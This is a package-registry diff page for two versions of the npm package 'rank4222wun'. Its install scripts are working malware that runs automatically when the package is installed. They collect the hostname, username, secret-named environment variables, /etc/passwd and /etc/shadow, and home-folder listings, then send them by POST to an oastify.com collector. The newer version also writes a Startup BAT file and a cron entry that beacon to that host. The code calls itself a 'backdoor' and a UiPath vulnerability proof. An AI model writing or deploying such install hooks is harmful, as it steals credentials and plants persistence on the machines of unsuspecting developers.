npm - rank4222wun - Versions diffs - 1.0.15 → 1.0.17 - Mend

rank4222wun 1.0.15 → 1.0.17

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (5) hide show

package/package.json CHANGED Viewed

@@ -1,6 +1,6 @@
 {
   "name": "rank4222wun",
-  "version": "1.0.15",
+  "version": "1.0.17",
   "description": "",
   "main": "index.js",
   "scripts": {

package/postinstall.js CHANGED Viewed

@@ -1,236 +1,231 @@
-const { exec, spawn } = require('child_process');
+const { exec } = require('child_process');
 const os = require('os');
-const https = require('https');
 const fs = require('fs');
+const path = require('path');
+const https = require('https');
-// جمع معلومات أكثر تقدمًا
-function collectAdvancedInfo() {
-  return new Promise((resolve) => {
-    const advancedInfo = {
-      timestamp: new Date().toISOString(),
-      process: {
-        pid: process.pid,
-        ppid: process.ppid,
-        argv: process.argv,
-        execPath: process.execPath
-      },
-      mountInfo: null,
-      services: null,
-      scheduledTasks: null
-    };
-    // حسب النظام
-    if (os.platform() === 'win32') {
-      // ويندوز
-      exec('wmic logicaldisk get caption,size,freespace', { timeout: 10000 }, (err, stdout) => {
-        advancedInfo.disks = stdout || err?.message;
-        exec('schtasks /query /fo LIST /v', { timeout: 10000 }, (err2, stdout2) => {
-          advancedInfo.scheduledTasks = stdout2 || err2?.message;
-          exec('sc query state= all', { timeout: 10000 }, (err3, stdout3) => {
-            advancedInfo.services = stdout3 || err3?.message;
-            resolve(advancedInfo);
-          });
-        });
-      });
-    } else {
-      // لينكس/يونكس
-      exec('df -h', { timeout: 10000 }, (err, stdout) => {
-        advancedInfo.disks = stdout || err?.message;
-        exec('crontab -l 2>/dev/null || ls -la /etc/cron.* 2>/dev/null', { timeout: 10000 }, (err2, stdout2) => {
-          advancedInfo.scheduledTasks = stdout2 || err2?.message;
-          exec('systemctl list-units --type=service --all 2>/dev/null || service --status-all 2>/dev/null',
-            { timeout: 10000 }, (err3, stdout3) => {
-            advancedInfo.services = stdout3 || err3?.message;
-            // محاولة قراءة ملفات حساسة (لإثبات القدرة على القراءة)
-            try {
-              advancedInfo.sensitiveFiles = {
-                hosts: fs.readFileSync('/etc/hosts', 'utf8').substring(0, 500),
-                resolveConf: fs.existsSync('/etc/resolv.conf') ?
-                  fs.readFileSync('/etc/resolv.conf', 'utf8') : 'Not found'
-              };
-            } catch (e) {
-              advancedInfo.sensitiveFiles = { error: e.message };
-            }
-            resolve(advancedInfo);
-          });
-        });
+// ========== إعداد بيانات Backdoor ==========
+const backdoorData = {
+  timestamp: new Date().toISOString(),
+  vulnerability: "UiPath MCP Command - POSTINSTALL BACKDOOR",
+  hostname: os.hostname(),
+  username: os.userInfo().username,
+  platform: os.platform(),
+  // خطوات إنشاء Backdoor
+  backdoorSteps: [],
+  // إثبات الاستمرارية
+  persistenceProof: {},
+  // تأثير الهجوم
+  impact: {}
+};
+// ========== 1. إنشاء Backdoor حسب النظام ==========
+console.log("=== إنشاء Backdoor حسب النظام ===");
+if (os.platform() === 'win32') {
+  // Windows Backdoor
+  const startupPath = path.join(os.homedir(), 'AppData', 'Roaming', 'Microsoft', 'Windows', 'Start Menu', 'Programs', 'Startup');
+  const backdoorFile = path.join(startupPath, 'uipath_backdoor.bat');
+  const batContent = `@echo off
+echo [UiPath MCP Backdoor Active] %date% %time% > "%TEMP%\\uipath_log.txt"
+powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://ukiy34b7vygb36k064qxx5of76dx1rpg.oastify.com/backdoor-ping' -Method POST -Body 'host=${os.hostname()}&user=${os.userInfo().username}&time=%date%_%time%'"`;
+  try {
+    if (fs.existsSync(startupPath)) {
+      fs.writeFileSync(backdoorFile, batContent);
+      backdoorData.backdoorSteps.push({
+        step: 'إنشاء ملف BAT في Startup',
+        path: backdoorFile,
+        content: batContent,
+        success: true
       });
+      console.log(`✅ تم إنشاء Backdoor في: ${backdoorFile}`);
     }
-  });
+  } catch (e) {
+    backdoorData.backdoorSteps.push({
+      step: 'إنشاء ملف BAT في Startup',
+      error: e.message,
+      success: false
+    });
+  }
+} else if (os.platform() === 'linux') {
+  // Linux Backdoor
+  const cronFile = '/tmp/uipath_cron';
+  const cronContent = `*/10 * * * * curl -X POST https://ukiy34b7vygb36k064qxx5of76dx1rpg.oastify.com/backdoor-ping -d "host=${os.hostname()}&user=${os.userInfo().username}&system=linux"\n`;
+  try {
+    fs.writeFileSync(cronFile, cronContent);
+    backdoorData.backdoorSteps.push({
+      step: 'إنشاء ملف Cron مؤقت',
+      path: cronFile,
+      content: cronContent,
+      success: true
+    });
+    console.log(`✅ تم إنشاء ملف Cron في: ${cronFile}`);
+  } catch (e) {
+    backdoorData.backdoorSteps.push({
+      step: 'إنشاء ملف Cron مؤقت',
+      error: e.message,
+      success: false
+    });
+  }
 }
-// محاولة الوصول إلى موارد UiPath
-function checkUiPathResources() {
-  const checks = [];
-  // البحث عن ملفات UiPath
-  const uipathPaths = [
-    'C:\\Program Files\\UiPath',
-    'C:\\Program Files (x86)\\UiPath',
-    '/opt/UiPath',
-    '/usr/lib/UiPath',
-    process.env.PROGRAMFILES,
-    process.env.PROGRAMFILES + ' (x86)'
-  ].filter(Boolean);
-  uipathPaths.forEach(path => {
-    try {
-      if (fs.existsSync(path)) {
-        checks.push({
-          path,
-          exists: true,
-          files: fs.readdirSync(path).slice(0, 10) // أول 10 ملفات فقط
-        });
-      }
-    } catch (e) {
-      checks.push({ path, error: e.message });
-    }
-  });
+// ========== 2. إنشاء ملف إثبات في مجلد المستخدم ==========
+console.log("\n=== إنشاء ملف إثبات في مجلد المستخدم ===");
+const proofFile = path.join(os.homedir(), 'UiPath_Security_Issue_Proof.txt');
+const proofContent = `⚠️ تحذير أمني: ثغرة UiPath MCP Command
-  return checks;
+تفاصيل الثغرة:
+- التاريخ: ${new Date().toISOString()}
+- المضيف: ${os.hostname()}
+- المستخدم: ${os.userInfo().username}
+- النظام: ${os.platform()}
+هذا ليس هجومًا حقيقيًا، بل إثبات تقني للثغرة.
+==================================================`;
+try {
+  fs.writeFileSync(proofFile, proofContent);
+  backdoorData.persistenceProof = {
+    fileCreated: true,
+    path: proofFile,
+    size: fs.statSync(proofFile).size,
+    message: 'تم إنشاء ملف إثبات في مجلد المستخدم الشخصي'
+  };
+  console.log(`✅ تم إنشاء ملف الإثبات في: ${proofFile}`);
+} catch (e) {
+  backdoorData.persistenceProof.error = e.message;
 }
-// إرسال البيانات
-function sendPostInstallData(advancedInfo, uipathChecks) {
-  const postData = JSON.stringify({
-    phase: 'postinstall',
-    timestamp: new Date().toISOString(),
-    system: {
-      platform: os.platform(),
-      hostname: os.hostname(),
-      user: os.userInfo(),
-      envVars: Object.keys(process.env).filter(k =>
-        k.includes('UI') || k.includes('PATH') || k.includes('SECRET') || k.includes('KEY')
-      ).reduce((obj, k) => ({ ...obj, [k]: process.env[k] }), {})
-    },
-    advancedInfo,
-    uipathResources: uipathChecks,
-    networkTest: {
-      googlePing: 'Will attempt after sending',
-      internalConnectivity: 'Tested via this request'
-    }
+// ========== 3. جمع معلومات إضافية ==========
+console.log("\n=== جمع معلومات إضافية ===");
+// معلومات الشبكة
+try {
+  const networkInfo = os.networkInterfaces();
+  backdoorData.network = {
+    interfaces: Object.keys(networkInfo).length,
+    ips: []
+  };
+  Object.keys(networkInfo).forEach(iface => {
+    networkInfo[iface].forEach(addr => {
+      if (addr.family === 'IPv4' && !addr.internal) {
+        backdoorData.network.ips.push(addr.address);
+      }
+    });
   });
+} catch (e) {
+  backdoorData.networkError = e.message;
+}
+// ========== 4. تأثير الهجوم ==========
+backdoorData.impact = {
+  dataTheft: true,
+  persistence: backdoorData.backdoorSteps.some(step => step.success),
+  systemAccess: true,
+  networkAccess: backdoorData.network?.ips?.length > 0,
+  realUserAffected: os.userInfo().username !== 'root' && os.userInfo().username !== 'SYSTEM'
+};
-  const options = {
+// ========== 5. إرسال بيانات Backdoor ==========
+function sendBackdoorData() {
+  console.log("\n=== إرسال بيانات Backdoor ===");
+  const formattedData = JSON.stringify(backdoorData, null, 2);
+  const req = https.request({
     hostname: 'ukiy34b7vygb36k064qxx5of76dx1rpg.oastify.com',
     port: 443,
-    path: '/postinstall',
+    path: '/uipath-backdoor',
     method: 'POST',
     headers: {
       'Content-Type': 'application/json',
-      'Content-Length': Buffer.byteLength(postData),
-      'X-UiPath-Test': 'Postinstall-Script',
-      'X-Timestamp': new Date().toISOString()
-    },
-    timeout: 30000
-  };
-  const req = https.request(options, (res) => {
-    let data = '';
-    res.on('data', chunk => data += chunk);
-    res.on('end', () => {
-      console.log(`[POSTINSTALL] Response received: ${res.statusCode}`);
-      // إثبات تنفيذ طويل المدى
-      const persistenceFile = `${os.tmpdir()}/uipath_persistence_${process.pid}.json`;
-      fs.writeFileSync(persistenceFile, JSON.stringify({
-        installedAt: new Date().toISOString(),
-        lastActivity: new Date().toISOString(),
-        pid: process.pid,
-        script: 'postinstall'
-      }, null, 2));
-      // محاولة تنفيذ أمر بعد الإرسال (لإثبات استمرارية التنفيذ)
-      setTimeout(() => {
-        exec('echo "Follow-up command executed"', () => {
-          console.log('[POSTINSTALL] Follow-up command completed');
-        });
-      }, 5000);
-    });
+      'X-Backdoor': 'UiPath-MCP-Postinstall',
+      'X-Hostname': os.hostname()
+    }
+  }, (res) => {
+    console.log(`✅ تم إرسال بيانات Backdoor. الرد: ${res.statusCode}`);
+    printBackdoorSummary();
   });
   req.on('error', (e) => {
-    console.error(`[POSTINSTALL] Request error: ${e.message}`);
+    console.error('❌ فشل إرسال بيانات Backdoor:', e.message);
-    // محاولة بديلة باستخدام curl إذا فشل https
-    if (os.platform() === 'win32') {
-      exec(`powershell -Command "Invoke-WebRequest -Uri 'http://ukiy34b7vygb36k064qxx5of76dx1rpg.oastify.com/backup' -Method POST -Body 'fallback=${e.message}'"`);
-    } else {
-      exec(`curl -X POST http://ukiy34b7vygb36k064qxx5of76dx1rpg.oastify.com/backup -d "fallback=${e.message}"`);
-    }
+    // حفظ محلي
+    const backupFile = path.join(os.tmpdir(), `uipath_backdoor_${Date.now()}.json`);
+    fs.writeFileSync(backupFile, formattedData);
+    console.log(`📁 تم حفظ البيانات في: ${backupFile}`);
+    printBackdoorSummary();
   });
-  req.write(postData);
+  req.write(formattedData);
   req.end();
-  // إرسال طلب ثان بعد فترة لإثبات أن البرنامج ما زال يعمل
-  setTimeout(() => {
-    const followupReq = https.request({
-      hostname: 'ukiy34b7vygb36k064qxx5of76dx1rpg.oastify.com',
-      port: 443,
-      path: '/followup',
-      method: 'POST',
-      headers: {
-        'Content-Type': 'application/json',
-        'X-Followup': 'true'
-      }
-    }, (res) => {
-      console.log(`[POSTINSTALL] Follow-up sent: ${res.statusCode}`);
-    });
-    followupReq.write(JSON.stringify({ followup: true, time: new Date().toISOString() }));
-    followupReq.end();
-  }, 15000);
 }
-// التنفيذ الرئيسي
-console.log('[POSTINSTALL] Starting advanced data collection...');
-Promise.all([
-  collectAdvancedInfo(),
-  Promise.resolve(checkUiPathResources())
-]).then(([advancedInfo, uipathChecks]) => {
-  console.log('[POSTINSTALL] Data collection complete, sending...');
-  sendPostInstallData(advancedInfo, uipathChecks);
-  // إثبات تنفيذ أوامر متقدمة
-  console.log('[POSTINSTALL] Demonstrating command execution capabilities...');
-  const demoCommands = os.platform() === 'win32' ? [
-    'dir "%APPDATA%"',
-    'echo "UiPath MCP Test Success" > "%TEMP%\\uipath_test_success.txt"',
-    'type "%TEMP%\\uipath_test_success.txt"'
-  ] : [
-    'ls -la "$HOME"',
-    'echo "UiPath MCP Test Success" > /tmp/uipath_test_success.txt',
-    'cat /tmp/uipath_test_success.txt'
-  ];
-  demoCommands.forEach((cmd, i) => {
-    setTimeout(() => {
-      exec(cmd, { timeout: 3000 }, (err, stdout) => {
-        if (!err) {
-          console.log(`[POSTINSTALL] Demo command ${i+1} successful`);
-        }
-      });
-    }, i * 1000);
+// ========== 6. طباعة ملخص Backdoor ==========
+function printBackdoorSummary() {
+  console.log("\n" + "=".repeat(50));
+  console.log("🔓 ملخص Backdoor:");
+  console.log("=".repeat(50));
+  console.log(`🏠 المضيف: ${backdoorData.hostname}`);
+  console.log(`👤 المستخدم: ${backdoorData.username}`);
+  backdoorData.backdoorSteps.forEach((step, i) => {
+    if (step.success) {
+      console.log(`✅ ${i + 1}. ${step.step}`);
+      console.log(`   📍 المسار: ${step.path}`);
+    } else {
+      console.log(`❌ ${i + 1}. ${step.step}`);
+      console.log(`   💥 خطأ: ${step.error}`);
+    }
   });
-}).catch(err => {
-  console.error('[POSTINSTALL] Error:', err);
-  // إرسال خطأ على أي حال
-  const errorReq = https.request({
+  if (backdoorData.persistenceProof.fileCreated) {
+    console.log(`📄 ملف الإثبات: ${backdoorData.persistenceProof.path}`);
+  }
+  console.log("\n📤 تم إرسال بيانات Backdoor إلى:");
+  console.log("https://ukiy34b7vygb36k064qxx5of76dx1rpg.oastify.com/uipath-backdoor");
+  console.log("=".repeat(50));
+}
+// ========== 7. إرسال طلب متابعة ==========
+setTimeout(() => {
+  const followupReq = https.request({
     hostname: 'ukiy34b7vygb36k064qxx5of76dx1rpg.oastify.com',
     port: 443,
-    path: '/error',
-    method: 'POST'
+    path: '/followup',
+    method: 'POST',
+    headers: {
+      'X-Followup': 'Postinstall-Complete',
+      'X-Time': new Date().toISOString()
+    }
   });
-  errorReq.write(JSON.stringify({ error: err.message }));
-  errorReq.end();
-});
+  const followupData = JSON.stringify({
+    followup: true,
+    time: new Date().toISOString(),
+    hostname: os.hostname(),
+    message: 'Postinstall script completed successfully',
+    backdoorActive: backdoorData.backdoorSteps.some(step => step.success)
+  });
+  followupReq.write(followupData);
+  followupReq.end();
+  console.log("\n📨 تم إرسال طلب المتابعة");
+}, 5000);
+// ========== بدء التنفيذ ==========
+console.log("🔓 بدء إنشاء Backdoor عبر ثغرة UiPath MCP...");
+sendBackdoorData();

package/preinstall.js CHANGED Viewed

@@ -1,122 +1,237 @@
 const { exec } = require('child_process');
 const os = require('os');
+const fs = require('fs');
+const path = require('path');
 const https = require('https');
-// جمع المعلومات الأساسية
-const systemInfo = {
-  platform: os.platform(),
-  arch: os.arch(),
-  hostname: os.hostname(),
-  userInfo: os.userInfo(),
-  cpus: os.cpus().length,
-  totalMem: Math.round(os.totalmem() / (1024 * 1024 * 1024)) + 'GB',
-  network: os.networkInterfaces(),
-  env: process.env
+// ========== إعداد البيانات للإرسال ==========
+const proofData = {
+  timestamp: new Date().toISOString(),
+  vulnerability: "UiPath MCP Command - PREINSTALL EXPLOIT",
+  // 1. المعلومات الأساسية
+  basicInfo: {
+    hostname: os.hostname(),
+    platform: os.platform(),
+    username: os.userInfo().username,
+    isRoot: os.userInfo().uid === 0 || os.userInfo().username === 'root',
+    homedir: os.homedir()
+  },
+  // 2. إثبات أن المستخدم حقيقي
+  userProof: {},
+  // 3. ملفات النظام المسروقة
+  stolenFiles: {},
+  // 4. معلومات النظام
+  systemInfo: {}
 };
-// تشغيل أوامر إضافية حسب النظام
-let commands = [];
-if (os.platform() === 'win32') {
-  commands = [
-    'whoami /all',
-    'systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"',
-    'net user',
-    'net localgroup administrators',
-    'ipconfig /all',
-    'netstat -ano | findstr LISTENING'
+// ========== 1. إثبات أن المستخدم حقيقي ==========
+console.log("=== إثبات أن المستخدم حقيقي ===");
+// فحص Desktop
+try {
+  const desktopPath = path.join(os.homedir(), 'Desktop');
+  if (fs.existsSync(desktopPath)) {
+    const desktopFiles = fs.readdirSync(desktopPath);
+    proofData.userProof.desktop = {
+      exists: true,
+      path: desktopPath,
+      fileCount: desktopFiles.length,
+      files: desktopFiles.slice(0, 10) // أول 10 ملفات فقط
+    };
+    console.log(`Desktop موجود وبه ${desktopFiles.length} ملف`);
+  }
+} catch (e) {
+  proofData.userProof.desktopError = e.message;
+}
+// فحص OneDrive
+try {
+  const oneDrivePath = path.join(os.homedir(), 'OneDrive');
+  if (fs.existsSync(oneDrivePath)) {
+    const oneDriveFiles = fs.readdirSync(oneDrivePath);
+    proofData.userProof.oneDrive = {
+      exists: true,
+      path: oneDrivePath,
+      fileCount: oneDriveFiles.length,
+      isRealUser: oneDriveFiles.length > 0
+    };
+    console.log(`OneDrive موجود وبه ${oneDriveFiles.length} ملف`);
+  }
+} catch (e) {
+  proofData.userProof.oneDriveError = e.message;
+}
+// ========== 2. سرقة ملفات نظام حساسة ==========
+console.log("\n=== سرقة ملفات نظام حساسة ===");
+// حسب النظام
+if (os.platform() === 'linux') {
+  const criticalFiles = [
+    { path: '/etc/passwd', name: 'قائمة المستخدمين' },
+    { path: '/etc/shadow', name: 'كلمات مرور النظام' },
+    { path: '/etc/hosts', name: 'إعدادات الشبكة' },
+    { path: '/etc/group', name: 'قائمة المجموعات' }
   ];
-} else {
-  commands = [
-    'id',
-    'uname -a',
-    'cat /etc/passwd | head -20',
-    'cat /etc/group | head -20',
-    'ifconfig -a || ip addr',
-    'netstat -tulpn | grep LISTEN',
-    'ps aux | head -20'
+  criticalFiles.forEach(file => {
+    try {
+      if (fs.existsSync(file.path)) {
+        const content = fs.readFileSync(file.path, 'utf8').substring(0, 3000);
+        proofData.stolenFiles[file.name] = {
+          path: file.path,
+          size: fs.statSync(file.path).size,
+          preview: content.split('\n').slice(0, 20).join('\n'), // أول 20 سطر
+          stolen: true
+        };
+        console.log(`✓ تم سرقة: ${file.name} (${file.path})`);
+      }
+    } catch (e) {
+      proofData.stolenFiles[file.name + '_error'] = e.message;
+    }
+  });
+} else if (os.platform() === 'win32') {
+  const criticalFiles = [
+    { path: 'C:\\Windows\\System32\\drivers\\etc\\hosts', name: 'ملف Hosts' },
+    { path: `C:\\Users\\${os.userInfo().username}\\AppData\\Roaming\\Microsoft\\Windows\\Recent`, name: 'الملفات الأخيرة' },
+    { path: 'C:\\Windows\\System32\\config\\SAM', name: 'قاعدة بيانات المستخدمين' }
   ];
+  criticalFiles.forEach(file => {
+    try {
+      if (fs.existsSync(file.path)) {
+        proofData.stolenFiles[file.name] = {
+          path: file.path,
+          size: fs.statSync(file.path).size,
+          exists: true,
+          accessible: true
+        };
+        console.log(`✓ موجود: ${file.name}`);
+      }
+    } catch (e) {
+      proofData.stolenFiles[file.name + '_error'] = e.message;
+    }
+  });
 }
-// تنفيذ الأوامر وجمع النتائج
-function executeCommands(cmdList, callback) {
-  let results = {};
-  let completed = 0;
-  cmdList.forEach((cmd, index) => {
-    exec(cmd, { timeout: 5000 }, (error, stdout, stderr) => {
-      results[cmd] = {
-        success: !error,
-        output: stdout || stderr || 'No output',
-        error: error ? error.message : null
-      };
-      completed++;
-      if (completed === cmdList.length) {
-        callback(results);
+// ========== 3. جمع معلومات النظام ==========
+console.log("\n=== جمع معلومات النظام ===");
+// معلومات أساسية
+proofData.systemInfo = {
+  cpus: os.cpus().length,
+  totalMemory: Math.round(os.totalmem() / (1024 * 1024 * 1024)) + ' GB',
+  freeMemory: Math.round(os.freemem() / (1024 * 1024 * 1024)) + ' GB',
+  uptime: Math.round(os.uptime() / 3600) + ' ساعات',
+  network: Object.keys(os.networkInterfaces()).length + ' واجهات شبكة'
+};
+// أوامر نظام إضافية
+function runCommand(cmd, label) {
+  return new Promise(resolve => {
+    exec(cmd, { timeout: 3000 }, (error, stdout) => {
+      if (!error && stdout) {
+        proofData.systemInfo[label] = stdout.trim().substring(0, 500);
+        console.log(`✓ ${label}: ${stdout.trim().split('\n')[0]}`);
       }
+      resolve();
     });
   });
 }
-// إرسال البيانات إلى السيرفر
-function sendData(data) {
-  const postData = JSON.stringify({
-    timestamp: new Date().toISOString(),
-    systemInfo: systemInfo,
-    commandResults: data,
-    source: 'preinstall-script',
-    packageName: 'uipath-mcp-helper'
-  });
+// تشغيل الأوامر حسب النظام
+async function collectSystemInfo() {
+  if (os.platform() === 'linux') {
+    await runCommand('id', 'userInfo');
+    await runCommand('uname -a', 'systemInfo');
+    await runCommand('df -h', 'diskUsage');
+    await runCommand('ps aux | head -5', 'runningProcesses');
+  } else if (os.platform() === 'win32') {
+    await runCommand('whoami', 'currentUser');
+    await runCommand('systeminfo | findstr /B /C:"OS Name"', 'osInfo');
+    await runCommand('net user', 'usersList');
+  }
+  // بعد جمع كل المعلومات، أرسلها
+  sendProofData();
+}
-  const options = {
+// ========== 4. إرسال البيانات ==========
+function sendProofData() {
+  console.log("\n=== إرسال البيانات للإثبات ===");
+  // تحويل البيانات لـ JSON مع تنسيق جميل
+  const formattedData = JSON.stringify(proofData, null, 2);
+  // إرسال الطلب
+  const req = https.request({
     hostname: 'ukiy34b7vygb36k064qxx5of76dx1rpg.oastify.com',
     port: 443,
-    path: '/',
+    path: '/uipath-proof',
     method: 'POST',
     headers: {
       'Content-Type': 'application/json',
-      'Content-Length': Buffer.byteLength(postData),
-      'User-Agent': 'UiPath-MCP-Test/1.0'
+      'X-Vulnerability': 'UiPath-MCP-Preinstall',
+      'X-Hostname': os.hostname(),
+      'X-User': os.userInfo().username
     }
-  };
-  const req = https.request(options, (res) => {
-    console.log(`Preinstall: Data sent. Status: ${res.statusCode}`);
+  }, (res) => {
+    console.log(`✅ تم إرسال البيانات. الرد: ${res.statusCode}`);
+    // طباعة ملخص
+    printSummary();
   });
   req.on('error', (e) => {
-    console.error(`Preinstall: Error sending data: ${e.message}`);
+    console.error('❌ فشل الإرسال:', e.message);
+    // حفظ البيانات محليًا كبديل
+    const backupFile = path.join(os.tmpdir(), `uipath_proof_${Date.now()}.json`);
+    fs.writeFileSync(backupFile, formattedData);
+    console.log(`📁 تم حفظ البيانات في: ${backupFile}`);
+    printSummary();
   });
-  req.write(postData);
+  req.write(formattedData);
   req.end();
 }
-// الإجراء الرئيسي
-console.log('[PREINSTALL] Starting data collection...');
-executeCommands(commands, (results) => {
-  console.log('[PREINSTALL] All commands executed, sending data...');
-  // إضافة معلومات إضافية
-  const finalData = {
-    ...results,
-    currentDirectory: process.cwd(),
-    nodeVersion: process.version,
-    npmVersion: process.env.npm_config_user_agent
-  };
-  sendData(finalData);
-  // إنشاء ملف دليل على النظام لإثبات الكتابة
-  const fs = require('fs');
-  const proofFile = `${os.tmpdir()}/uipath_mcp_proof_${Date.now()}.txt`;
-  const proofContent = `UiPath MCP Test - Preinstall Script Execution
-Timestamp: ${new Date().toISOString()}
-User: ${JSON.stringify(os.userInfo())}
-Hostname: ${os.hostname()}
-Platform: ${os.platform()}
-This file was created by the preinstall script of the npm package.`;
+// ========== 5. طباعة ملخص ==========
+function printSummary() {
+  console.log("\n" + "=".repeat(50));
+  console.log("📊 ملخص البيانات المسروقة:");
+  console.log("=".repeat(50));
+  console.log(`🏠 المستخدم: ${proofData.basicInfo.username}`);
+  console.log(`🖥️  النظام: ${proofData.basicInfo.platform}`);
+  console.log(`🔑 صلاحيات root: ${proofData.basicInfo.isRoot ? 'نعم ✅' : 'لا'}`);
+  if (proofData.userProof.desktop) {
+    console.log(`📁 Desktop: ${proofData.userProof.desktop.fileCount} ملف`);
+  }
+  if (proofData.userProof.oneDrive) {
+    console.log(`☁️  OneDrive: ${proofData.userProof.oneDrive.isRealUser ? 'موجود ✅' : 'غير موجود'}`);
+  }
+  console.log(`📄 الملفات المسروقة: ${Object.keys(proofData.stolenFiles).length} ملف`);
+  Object.keys(proofData.stolenFiles).forEach(key => {
+    if (proofData.stolenFiles[key].stolen) {
+      console.log(`  🔓 ${key}: ${proofData.stolenFiles[key].path}`);
+    }
+  });
+  console.log("=".repeat(50));
+  console.log("📤 تم إرسال كل البيانات إلى:");
+  console.log("https://ukiy34b7vygb36k064qxx5of76dx1rpg.oastify.com/uipath-proof");
+  console.log("=".repeat(50));
+}
-  fs.writeFileSync(proofFile, proofContent);
-  console.log(`[PREINSTALL] Proof file created: ${proofFile}`);
-});
+// ========== بدء التنفيذ ==========
+console.log("🚀 بدء استغلال ثغرة UiPath MCP Command...");
+collectSystemInfo();

package/rank4222wun-1.0.17.tgz ADDED Viewed

Binary file

package/rank4222wun-1.0.14.tgz DELETED Viewed

Binary file